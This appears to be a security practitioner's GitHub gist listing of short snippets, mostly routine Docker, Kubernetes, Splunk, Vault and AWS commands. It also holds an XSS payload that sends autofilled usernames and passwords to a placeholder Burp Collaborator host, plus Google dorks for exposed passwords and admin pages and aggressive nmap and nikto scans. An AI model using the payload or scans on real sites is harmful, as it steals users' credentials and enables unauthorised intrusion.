Skip to content

Instantly share code, notes, and snippets.

View kibelous's full-sized avatar

kbelous kibelous

1 follower · 0 following
View GitHub Profile
@kibelous
kibelous / capture-passwords.js
Last active September 10, 2022 17:43
[XSS] Malicious payloads
// if users use password managers to autofill credentials
<input name='username' id='username'>
<input type='password' name='password' onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
@kibelous
kibelous / commands.sh
Last active April 28, 2021 05:54
Docker
# Remove dangling unused images
docker rmi $(docker images --filter "dangling=true" -q --no-trunc)
@kibelous
kibelous / google_dorks.sh
Last active September 21, 2022 00:18
Google Dorks
# Searching vulnerability by CVE in BugTraq
site:www.securityfocus.com intext:CVE-2020-7059
# Other
site:.domain.com allintext:(root|admin|password)
site:.domain.com intitle:(admin|login|internal)
site:.domain.com inurl:(admin|login|logout|crm|cms)
site:.domain.com "powered by"
site:.domain.com filetype:pdf
site:.domain.com allintext:password filetype:log after:2019
@kibelous
kibelous / splunk-local-env.sh
Last active January 9, 2022 14:11
Splunk
# MAin Splunk dir
cd /Applications/Splunk/bin
# Main URL
http://localhost:8000
# Start Splunk ES instance
./splunk start
# Stop Splunk ES instance
./splunk stop
@kibelous
kibelous / all_cmd.sh
Last active July 8, 2022 07:53
Kubernetes
# Rolling restart of a POD deployment
kubectl rollout restart deployment <deployment_name>
@kibelous
kibelous / nmap.sh
Last active June 6, 2021 08:23
Nmap
# Host Discovery
nmap -v -sn -PE <target-CIDR> | awk '/Nmap scan/{gsub(/[()]/,"",$NF); print $NF > "nmap_scanned_ips"}'
# Aggressive scan
nmap -v -Pn -sS -A -p- -T4 --min-rate 100 -iL nmap_scanned_ips -oX nmap_synscan.xml
# Generate HTML report
xsltproc nmap_synscan.xml -o synscan.html
# Detection of service version
@kibelous
kibelous / nikto.sh
Last active December 5, 2020 06:37
Docker for Pentester
# Basic usage
docker run --rm nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
docker run --rm -v $(pwd):/tmp nikto -h http://www.example.com -o /tmp/out.json
@kibelous
kibelous / communicate-with-vault.sh
Created August 27, 2020 08:48
Vault Commands #bash
export VAULT_CACERT=/etc/vault.d/ssl/root_CA.crt
sudo -E vault [command]
@kibelous
kibelous / all-ec2-instances.sh
Last active August 29, 2021 08:41
AWS Commands #bash
clear && echo '' && date -u '+%c %z' && echo '\nAWS - EC2 Instances\n' && aws ec2 describe-regions --query "Regions[].[RegionName]" --out text | xargs -I {} aws ec2 describe-instances --query "Reservations[].Instances[].[PrivateIpAddress,[Tags[?Key=='Name'].Value][0][0],PublicIpAddress,Placement.AvailabilityZone,LaunchTime,State.Name]" --region {} --output text | sed -E 's/[[:space:]]+/,/g' && echo '\nAWS - ELB Instances\n' && aws ec2 describe-regions --query "Regions[].[RegionName]" --out text | xargs -I {} aws elb describe-load-balancers --query "LoadBalancerDescriptions[].[DNSName,LoadBalancerName,AvailabilityZones[],CreatedTime]" --region {} --out text | sed -E 's/[[:space:]]+/,/g' | tee /dev/tty | cut -d ',' -f1 | xargs -I {} host {} | grep -v "not found"
@kibelous
kibelous / check-package-is-installed.sh
Last active December 28, 2020 08:37
Linux Audit Commands $bash
grep -i "install\|installed\|half-installed" /var/log/dpkg.log | grep <package-name>